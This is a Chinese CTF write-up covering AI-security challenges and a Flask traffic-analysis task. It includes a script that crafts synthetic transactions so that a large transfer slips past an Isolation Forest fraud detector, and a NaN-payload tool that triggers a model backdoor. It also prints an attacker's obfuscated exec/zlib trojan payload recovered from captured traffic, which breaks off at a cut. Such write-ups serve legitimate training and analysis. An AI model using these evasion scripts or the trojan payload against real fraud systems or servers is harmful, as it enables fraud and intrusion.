第三届“长城杯”&ciscn初赛Misc wp

AI安全

The Silent Heist

题目要求:

1
2
3
4
5
6
7
8
[--- 安全银行网关 v4.0 ---]
任务:转账金额 > 2,000,000.00 美元
安全级别:隔离森林(严格模式)
约束条件:
1. 任何交易均不得被判定为异常(-1)。
2. 禁止重放攻击(公共数据已被列入黑名单)。
3. 禁止重复交易。
------------------------------------- 正在等待 CSV 数据流(以“EOF”结尾)...

数据正常的读取,跳过表头那一行

1
2
3
4
5
6
7
8
9
def read_data():
    data = []
    with open('public_ledger.csv', 'r') as f:
        lines = f.readlines()
        for line in lines[1:]:
            values = line.strip().split(',')
            if len(values) == 20:
                data.append([float(v) for v in values])
    return np.array(data)

进行核密度估计

1
2
3
4
5
kdes = []
for i in range(20):
    kde = KernelDensity(bandwidth='silverman', kernel='gaussian')
    kde.fit(data[:,i:i+1])
    kdes.append(kde)

feat_0的特殊处理

1
2
3
4
5
6
7
8
current_total = np.sum(feat0_samples)
target_total = 2100000
scale_factor = target_total / current_total

for rank, idx in enumerate(sorted_indices):
    percentile = rank / n_samples
    individual_scale = 1 + (scale_factor - 1) * percentile
    scaled_feat0[idx] = feat0_samples[idx] * individual_scale

并且还要保持特征的相关性,以及避免微小的扰动造成重复,最后生成数据的exp为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
import numpy as np
from sklearn.neighbors import KernelDensity
import sys

def read_data():
    data = []
    with open('public_ledger.csv', 'r') as f:
        lines = f.readlines()
        for line in lines[1:]:
            values = line.strip().split(',')
            if len(values) == 20:
                try:
                    data.append([float(v) for v in values])
                except:
                    continue
    return np.array(data)

data = read_data()
n_samples = 10000  

kdes = []
for i in range(20):
    kde = KernelDensity(bandwidth='silverman', kernel='gaussian')
    kde.fit(data[:, i:i+1])
    kdes.append(kde)

new_data = np.zeros((n_samples, 20))

np.random.seed(42)
feat0_samples = kdes[0].sample(n_samples).flatten()
current_total = np.sum(feat0_samples)
target_total = 2100000
scale_factor = target_total / current_total

sorted_indices = np.argsort(feat0_samples)
scaled_feat0 = np.zeros_like(feat0_samples)

for rank, idx in enumerate(sorted_indices):
    percentile = rank / n_samples
    individual_scale = 1 + (scale_factor - 1) * percentile
    scaled_feat0[idx] = feat0_samples[idx] * individual_scale

new_data[:, 0] = scaled_feat0

for i in range(1, 20):
    
    correlation = np.corrcoef(data[:, 0], data[:, i])[0, 1]
    
    if abs(correlation) > 0.1: 
        base_samples = kdes[i].sample(n_samples).flatten()
        
        feat0_normalized = (new_data[:, 0] - np.mean(new_data[:, 0])) / np.std(new_data[:, 0])
        
        correlated_part = correlation * feat0_normalized * np.std(base_samples)
        new_data[:, i] = base_samples + correlated_part
    else:
        new_data[:, i] = kdes[i].sample(n_samples).flatten()

noise_level = 0.005  
for i in range(20):
    noise = np.random.normal(0, np.std(new_data[:, i]) * noise_level, n_samples)
    new_data[:, i] += noise

for i in range(20):
    feat_min = np.min(data[:, i])
    feat_max = np.max(data[:, i])
    feat_mean = np.mean(data[:, i])
    feat_std = np.std(data[:, i])
    lower_bound = max(feat_min * 0.8, feat_mean - 3 * feat_std)
    upper_bound = min(feat_max * 1.2, feat_mean + 3 * feat_std)
    
    new_data[:, i] = np.clip(new_data[:, i], lower_bound, upper_bound)

total_amount = np.sum(new_data[:, 0])

with open('flag.txt', 'w') as f:
    header = [f'feat_{i}' for i in range(20)]
    f.write(','.join(header) + '\n')
    
    for row in new_data:
        f.write(','.join([f"{x:.10f}" for x in row]) + '\n')
    
    f.write('EOF')

with open('flag.txt', 'r') as f:
    sys.stdout.write(f.read())

将得到的数据上传得到flag

欺诈猎手的后门陷阱

挑战目标:找到模型的后门触发条件,上传满足条件的特征数据,获取Flag

这题关于找到解密密钥先放着

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
AI Model Backdoor Exploitation Tool
"""

import json
import base64
import argparse
import logging
import sys
from itertools import cycle
from typing import Optional, Tuple

import requests
import urllib3

# 禁用SSL警告
urllib3.disable_warnings()

# 配置日志
logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - [%(levelname)s] - %(message)s',
    datefmt='%H:%M:%S'
)
logger = logging.getLogger(__name__)

class AISolver:
    def __init__(self, target_url: str, key: str, timeout: int = 10):
        self.target_url = target_url
        self.api_url = target_url.rstrip("/") + "/api/predict"
        self.key = key
        self.timeout = timeout
        self.session = requests.Session()
        self.session.headers.update({
            "Content-Type": "application/json",
            "User-Agent": "CTF-Solver/2.0"
        })

    def generate_nan_payload(self) -> str:
        """
        构造包含 NaN 的 Payload。
        注意:标准JSON不支持NaN,但Python的json.dumps默认会输出NaN,
        许多AI后端(pandas/numpy)读取时会将其解析为np.nan,从而绕过数值检查。
        """
        data = {
            "trans_amount_usd": float('nan'),
            "addr_deviation_score": float('nan'),
            "trans_time_risk_score": float('nan'),
            "merchant_code_hash": float('nan'),
            "card_issuer_code": float('nan'),
            "pos_terminal_id": float('nan'),
            "transaction_type_code": float('nan'),
            "cvv_verify_score": float('nan'),
            "account_age_month": float('nan'),
            "daily_trans_count": float('nan')
        }
        # 显式允许 NaN (Python默认也是True)
        return json.dumps(data, allow_nan=True)

    def trigger_backdoor(self) -> Tuple[Optional[str], Optional[str]]:
        """触发后门并获取加密FLAG"""
        logger.info(f"正在尝试触发后门: {self.api_url}")
        
        payload = self.generate_nan_payload()
        
        try:
            # 这里的 payload 是字符串形式,且包含 NaN
            response = self.session.post(
                self.api_url,
                data=payload,
                timeout=self.timeout,
                verify=False
            )
            response.raise_for_status()
            
            result = response.json()
            
            if result.get("backdoor_triggered"):
                logger.info("后门触发成功!")
                return result.get("encrypted_flag"), result.get("hint")
            else:
                logger.warning("请求成功但后门未触发 (可能是Payload被清洗)")
                logger.debug(f"响应内容: {result}")
                return None, None

        except requests.RequestException as e:
            logger.error(f"网络请求失败: {e}")
            return None, None
        except json.JSONDecodeError:
            logger.error("响应不是有效的JSON格式")
            return None, None

    def decrypt_flag(self, encrypted_flag: str) -> Optional[str]:
        """
        解密流程: Base64 -> XOR -> Base64
        """
        logger.info("开始解密 FLAG...")
        
        try:
            # 1. Base64 Decode
            step1_bytes = base64.b64decode(encrypted_flag)
            
            # 2. XOR Decrypt (使用 itertools.cycle 优化)
            key_bytes = self.key.encode('utf-8')
            decrypted_bytes = bytes(
                a ^ b for a, b in zip(step1_bytes, cycle(key_bytes))
            )
            logger.debug(f"XOR解密结果(Hex): {decrypted_bytes.hex()}")

            # 3. Base64 Decode Again
            # 先尝试解码,如果失败则尝试直接转义输出,防止题目坑点
            try:
                final_flag = base64.b64decode(decrypted_bytes).decode('utf-8')
            except Exception:
                logger.warning("二次Base64解码失败,尝试直接输出XOR结果")
                final_flag = decrypted_bytes.decode('utf-8', errors='ignore')

            return final_flag

        except Exception as e:
            logger.error(f"解密过程中发生错误: {e}")
            return None

    def run(self):
        """执行主流程"""
        enc_flag, hint = self.trigger_backdoor()
        
        if hint:
            logger.info(f"题目提示: {hint}")
            
        if enc_flag:
            flag = self.decrypt_flag(enc_flag)
            if flag:
                print("\n" + "="*60)
                print(f" [SUCCESS] FLAG: {flag}")
                print("="*60 + "\n")
            else:
                logger.error("解密得到空值")
        else:
            logger.error("未能获取加密FLAG,终止任务。")

def main():
    parser = argparse.ArgumentParser(description="CTF AI Backdoor Solver")
    parser.add_argument("-u", "--url", 
                        default="https://eci-2zej639k5zq7v01q60o6.cloudeci1.ichunqiu.com:5000/",
                        help="目标基础URL")
    parser.add_argument("-k", "--key", 
                        default="ctf_2025_key", 
                        help="解密密钥")
    parser.add_argument("--test", action="store_true", help="使用硬编码数据测试解密逻辑")
    
    args = parser.parse_args()

    if args.test:
        logger.info("进入本地测试模式...")
        solver = AISolver("http://localhost", args.key)
        # 测试数据
        test_enc = "Khk8LGtnVgIGPCsTOg4NbX8Cd0ERAT8UOR1Wb2h0WQcTPwJJOR4FK390Wl8RLDMQOR4za2hkZF45OCxE"
        res = solver.decrypt_flag(test_enc)
        print(f"测试解密结果: {res}")
    else:
        solver = AISolver(args.url, args.key)
        solver.run()

if __name__ == "__main__":
    main()

得到flag

流量分析

SnakeBackdoor-1

题目内容:

攻击者爆破成功的后台密码是什么?

可以看到此次登录得到一串字符串

1
eyJfZmxhc2hlcyI6W3siIHQiOlsic3VjY2VzcyIsIlx1NzY3Ylx1NWY1NVx1NjIxMFx1NTI5ZiJdfV0sImlzX2FkbWluIjp0cnVlfQ

base64解码得到

1
{"_flashes":[{" t":["success","\u767b\u5f55\u6210\u529f"]}],"is_admin":true}

\u767b\u5f55\u6210\u529f转字符也就是登录成功的意思

所以密码是zxcvbnm123

flag{zxcvbnm123}

SnakeBackdoor-2

题目内容:

攻击者通过漏洞利用获取Flask应用的 SECRET_KEY 是什么?

1
tcp contains "SECRET_KEY"

就一个包,直接查看

得到flag{c6242af0-6891-4510-8432-e1cdf051f160}

SnakeBackdoor-3

题目内容:

攻击者植入的木马使用了加密算法来隐藏通讯内容。请分析注入Payload,给出该加密算法使用的密钥字符串(Key)

neta查看能看到上面信息:

1
XyA9IGxhbWJkYSBfXyA6IF9faW1wb3J0X18oJ3psaWInKS5kZWNvbXByZXNzKF9faW1wb3J0X18oJ2Jhc2U2NCcpLmI2NGRlY29kZShfX1s6Oi0xXSkpOwpleGVjKChfKShiJz1jNENVM3hQKy8vdlB6ZnR2OGdyaTYzNWEwVDFyUXZNbEtHaTNpaUJ3dm02VEZFdmFoZlFFMlBFajdGT2NjVElQSThUR3FaTUMrbDlBb1lZR2VHVUFNY2Fyd1NpVHZCQ3YzN3lzK04xODVOb2NmbWpFL2ZPSGVpNE9uZTBDTDVUWndKb3BFbEp4THI5VkZYdlJsb2E1UXZyamlUUUtlRytTR2J5Wm0rNXpUay9WM25aMEc2TmVhcDdIdDZudSthY3hxc3Ivc2djNlJlRUZ4ZkVlMnAzMFlibXl5aXMzdWFWMXArQWowaUZ2cnRTc01Va2hKVzlWOVMvdE8rMC82OGdmeUtNL3lFOWhmNlM5ZUNEZFFwU3lMbktrRGlRazk3VFV1S0RQc09SM3BRbGRCL1VydmJ0YzRXQTFELzljdFpBV2NKK2pISkwxaytOcEN5dktHVmh4SDhETEw3bHZ1K3c5SW5VLzl6dDFzWC9Uc1VSVjdWMHhFWFpOU2xsWk1acjFrY0xKaFplQjhXNTl5bXhxZ3FYSkpZV0ppMm45NmhLdFNhMmRhYi9GMHhCdVJpWmJUWEZJRm1ENmtuR3ovb1B4ZVBUenVqUHE1SVd0OE5abXZ5TTVYRGcvTDhKVS9tQzRQU3ZYQStncWV1RHhMQ2x6Uk5ESEpVbXZ0a2FMYkp2YlpjU2c3VGdtN1VTZUpXa0NRb2pTaStJTklFajVjTjErRkZncEtSWG40Z1I5eXAzL1Y3OVduU2VFRklPNkM0aGNKYzRtd3BrKzA5dDF5dWU0K21BbGJobHhuWE0xUGZrK3NHQm1hVUZFMWtFak9wbmZHbnFzVithdU9xakpnY0RzaXZJZCt3SFBIYXp0NU1WczRySFJoWUJPQjZ5WGp1R1liRkhpM1hLV2hiN0FmTVZ2aHg3RjlhUGpObUlpR3FCVS9oUkZVdU1xQkNHK1ZWVVZBYmQ1cEZEVFpKM1A4d1V5bTZRQUFZUXZ4RytaSkRSU1F5cE9oWEsvTDRlRkZ0RXppdWZaUFN5cllQSldKbEFRc0RPK2RsaTQ2Y24xdTVBNUh5cWZuNHZ3N3pTcWUrVlVRL1JpL0tudjBwUW9XSDFkOWRHSndEZnFtZ3ZuS2krZ05SdWdjZlVqRzczVjZzL3RpaGx0OEIyM0t2bUp6cWlMUHptdWhyMFJGVUpLWmpHYTczaUxYVDRPdmxoTFJhU2JUVDR0cS9TQ2t0R1J5akxWbVNqMmtyMEdTc3FUamxMMmw2Yy9jWEtXalJNdDFrTUNtQ0NUVithSmU0bnB2b0I5OU9NbktuWlI0WXM1MjZtVEZUb1N3YTVqbXhCbWtSWUNtQTgyR0ZLN2FrNmJJUlRmRE1zV0dzWnZBRVh2M1BmdjVOUnpjSUZOTzN0YlFrZUIvTElWT1c1TGZBa21SNjgvNnpyTDBEWm9QanpGWkk1VkxmcTBydjlDd1VlSmtSM1BIY3VqKytkL2xPdms4L2gzSHpTZ1lUR0N3bDF1ano4aDRvVWlQeUdUNzROamJZN2ZKOHZVSHFOeitaVmZPdFZ3L3ozUk11cVNVekVBS3JqY1UyRE5RZWhCMG9ZN3hJbE9UOXU5QlQ0Uk9vREZvKzVaRjZ6Vm9IQTRlSWNrWFVPUDN5cFF2NXBFWUcrMHBXNE15SG1BUWZzT2FXeU1kZk1vcWJ3L005b0ltZEdLZEt5MVdxM2FxK3QreHV5VmROQVFNaG9XMkE3elF6b2I4WEdBM0c4VnVvS0hHT2NjMjVIQ2IvRlllU3hkd3lJZWRBeGtsTExZTUJIb2pUU3BEMWRFeG96ZGk4OUdpa2h6MzMwNW5kVG1FQ3YwWm9VT0hhY25xdFVVaEpseTdWZ3ZYK0psYXdBWTlvck5QVW1aTTdRS2JkT2tUZi9vOGFRbFM1RmUveFFrT01KR200TlhxTGVoaVJJYjkyNXNUZlZ4d29OZlA1djFNR2xhcllNaWZIbDJyRXA1QzcxaXBGanBBR2FFcDluUmowSmdFYTRsU1R1WWVWWHdxYlpRVDNPZlF2Z3QvYkhKbEFndXFTV3lzR2hxaElUSllNNlQxMG03MUppd2ZRSDVpTFhINVhiRms1M1FHY0cyY0FuRnJXeTcweEV2YWJtZjB1MGlrUXdwVTJzY1A4TG9FYS9DbEpuUFN1V3dpY01rVkxya1pHcW5CdmJrNkpUZzdIblQwdkdVY1Y2a2ZmSUw2Q0szYkUxRnkwUjZzbCtVUG9ZdmprZ1NJM1ViZkQ2N2JSeEl4ZWdCcFlUenlDRHpQeXRTRSthNzdzZHhzZ2hMcFVDNWh4ejRaZVhkeUlyYm1oQXFRdzVlRW5CdUFTRTVxVE1Ka1RwLy9oa3krZFQycGNpT0JZbi9BQ1NMeHByTFowQXkxK3pobCtYeVY5V0ZMNE5nQm9IMzRidmt4SDM2bmN0c3pvcFdHUHlkMTRSaVM0ZDBFcU5vY3F2dFd1M1l4a05nUCs4Zk0vZC9CMGlreEt4aC9HamttUVhhU1gvQis0MFU0YmZTYnNFSnBWT3NUSFR5NnUwTnI2N1N3N0J2Und1VnZmVDAvOGo3M2dZSEJPMmZHU0lKNDdBcllWbTIrTHpSVDBpSDVqN3lWUm1wdGNuQW44S2t4SjYzV0JHYjd1M2JkK0QrM3lsbm0xaDRBUjdNR042cjZMeHBqTmxBWDExd2EvWEIxek44Y1dVTm5DM1ZjemZ3VUV3UGZpNWR5bzluRUM1V085VW03OFdLUnJtM2M0OEl2VFVoZ2ROZVFFRG9zSWZoTVNtaWtFbHVRWDhMY0NSY0s5ZVVUODVidnI1SjVyekViK0R1aUdZeURGRzdQWmVmdkliM3czM3UycTh6bHhsdFdDU3RjNU80cThpV3JWSTd0YVpIeG93VHc1ekpnOVRkaEJaK2ZRclF0YzB5ZHJCbHZBbG5ZMTB2RUNuRlVCQSt5MWxXc1ZuOGNLeFVqVGRhdGk0QUYzaU0vS3VFdFE2Wm44Ykk0TFl3TWxHbkNBMVJHODhKOWw3RzRkSnpzV3I5eE9pRDhpTUkyTjFlWmQvUVV5NDNZc0lMV3g4MHlpQ3h6K0c0YlhmMnFOUkZ2Tk9hd1BTbnJwdjZRMG9GRVpvamx1UHg3Y09VMjdiQWJncHdUS28wVlV5SDZHNCt5c3ZpUXpVN1NSZDUxTEdHM1U2Y1QwWURpZFFtejJld3Ria2tLY0dWY1N5WU9lQ2xWNkNSejZiZEYvR20zVDIrUTkxNC9sa1piS3gxOVduWDc4cit4dzZicGp6V0xyMEUxZ2puS0NWeFcwWFNud2UraUc5ZGtHOG5DRmZqVWxoZFRhUzFnSjdMRnNtVWpuOHUvdlJRYlJMdy95NjZJcnIveW5LT0N6Uk9jZ3JuREZ4SDN6M0pUUVFwVGlEcGV5elJzRjRTbkdCTXY1SGJyK2NLNllUYTRNSWJmemo1VGkzRk1nSk5xZ0s1WGs5aHNpbEdzVTZ0VWJucDZTS2lKaFV2SjhicXluVU1Fem5kbCtTK09WUkNhSDJpSmw4VTNXanlCNjhScTRIQVRrL2NLN0xrSkhITWpDM1c3ZFRtT0JwZm9XTVZFTGFMK1JrcVdZdjBDcFc1cUVOTGxuT1BCckdhR05lSVphaHpibnJ1RVBJSVhHa0d6MWZFNWQ0Mk1hS1pzQ1VZdDF4WGlhaTkrY2JLR2ovZDBsSUNxN3VjN2JSaEVCeDQ2RHlCWFR6MWdmSm5UMnVyNng0QXZiNXdZMnBjWXJjRDJPUjZBaWtNdm0yYzBiaGFiSkI2bzBEaE9OSjRsQ3htS2RHQnp1d3J0czF1MEQyeXVvMzd5TExmc0dEdXllcE53OGx5VE5jMm55aENWQmZXMjNEbkJRbVdjMVFMQ29ScHBWaGpLWHdPcE9ES084UjhZSG5RTStyTGs2RU9hYkNkR0s1N2lSek1jVDN3YzQzNmtWbUhYRGNJMFpzWUdZNWFJQzVEYmRXalV0Mlp1VTBMbXVMd3pDVFM5OXpoT29POERLTnFiSzRiSU5MeUFJMlg5Mjh4aWIraG1JT3FwM29TZ0MyUGRGYzh5cXRoTjlTNTVvbXRleDJ4a0VlOENZNDhDNno0SnRxVnRxaFBRV1E4a3RlNnhsZXBpVllDcUliRTJWZzRmTi8vTC9mZi91Ly85cDRMejd1cTQ2eVdlbmtKL3g5MGovNW1FSW9yczVNY1N1Rmk5ZHlneXlSNXdKZnVxR2hPZnNWVndKZScpKQ==

base64解码得到

1
2
_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));
exec((_)(b'=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'))

可以看出数据要先经过反转再进行base64解码再进行zlib解压

反转 -> Base64解码 -> Zlib解压

1
2
3
4
5
6
import zlib
import base64

payload = b'=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